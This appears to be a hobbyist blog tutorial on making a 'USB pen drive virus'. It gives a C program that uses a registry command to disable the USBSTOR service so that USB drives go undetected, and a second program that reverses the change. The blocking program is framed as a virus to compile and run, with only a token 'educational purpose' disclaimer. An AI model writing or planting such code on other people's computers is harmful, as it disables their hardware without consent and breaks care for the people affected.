How to create USB Pen Drive virus ?
Virus is a program which infects computer, in different way. I am explaining about a virus which can easily be made in C or C++. When we have run .exe file of this Pen-drive-usb virus then when we connect pen-drive with our computer usb, it will not be connected. Operating System would not be able to detect pen-drive.
Code is written to directly change the usb registry option and change its key. Not going to explain about registry in detail now, later will explain.
1. Creating usb pen-drive Virus :-
- Install Turbo C or C++.
- Open TC.exe and there write the coding.
void main()
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
- Above Line system("....................."); it is in one Line.
- Save The Above Program as usbblock.c or any other name.
- Compile and Run the above Program.
- Congratulation! you are succesfull to create the usb-pendrive Virus.
- Now go to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used.
- Run that usbblock.exe in your computer to test.
- Attach Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virusDont infect any other computer as it is only for educational purpose.
2. To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-
- Install Turbo C or C++.
- Open TC.exe and there write the coding.
void main()
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
- Above Line system("....................."); it is in one Line.
- Save The Above Program as unblockusb.c or any other name.
- Compile and Run the above Program.
- Congratulation! you are succesfull to create .exe file to unblock USB.
- Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used.
- Run that unblockusb.exe to reverse the effect of usbblock.exe.
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